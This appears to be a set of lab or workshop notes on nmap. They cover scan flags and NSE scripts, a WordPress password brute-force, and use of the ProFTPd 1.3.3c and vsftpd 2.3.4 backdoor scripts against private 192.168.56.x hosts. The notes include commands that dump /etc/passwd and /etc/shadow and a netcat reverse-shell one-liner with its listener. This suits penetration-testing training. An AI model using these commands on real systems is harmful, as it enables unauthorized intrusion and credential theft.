nmap [scan type] [options] {targets}

Target specification
====================
CIDR notation
list notation:  192.168.56.16-20

Cool options
============

-sV  =  service report; program and version number, OS information of host
--top-ports N = scan only the most N popular/common ports (as defined by nmap)
-sU  =  scan for UDP services (slow)
--open = only display the ports that are actually open
-TN    = setthetiming template (higher is faster/more aggressive)
-sC    = run a default script
-A     = do a default script, plus traceroute, OS detect, etc.


Nmap Scripts
============
scripts are nmap's awesome feature - you can really extend the feature set
available to you with Lua

`nmap -sV --script {script name} [--script-args {args}] {targets}`
`nmap -sV --script=vuln 192`
`nmap --script-help all`   => Show help about all available scripts


## This command needs a dictionary

I created the minimal one with @Santiago's passwords in a file called 'pass'

    cat <<WORDS > pass.txt
    letmein
    monkey
    WORDS

`nmap -sV --script=http-wordpress-brute --script-args=passdb=pass.txt {TARGET}`


Kali Linux comes with better lists, which you can also clone from Daniel Miessler's GitHub

* Daniel Miessler's password lists
    https://github.com/danielmiessler/SecLists



Haxing ProFTPd 1.3.3c
=====================

ProFTPd 1.3.3c has a flaw which lets attackers execute arbitrary commands.

# Dump the passwd file 
nmap -sV --script=ftp-proftpd-backdoor --script-args="cmd=cat /etc/passwd" 192.168.56.19

# Dump the shadow file (proftpd is running as root)
nmap -sV --script=ftp-proftpd-backdoor --script-args="cmd=cat /etc/shadow" 192.168.56.19


## Remote Shell
### in one term: 
nmap -sV --script=ftp-proftpd-backdoor --script-args="cmd=rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.1 4444 > /tmp/f" 192.168.56.19

### in another shell: (from pentest-monkey.com)
nc -lp 4444



Santiago's Challenge:
=====================

There is a way to get a remote shell on the IP *192.168.56.20*

You have to find the hidden vsftpd 2.3.4 which has a backdoor on port 1337 --top-ports 2000

Then look up the script for vsftpd

`nmap -T4 -A -sV --top-ports 2000 --script=ftp-vsftpd-backdoor --script-args="cmd=uname -a" 192.168.56.20`

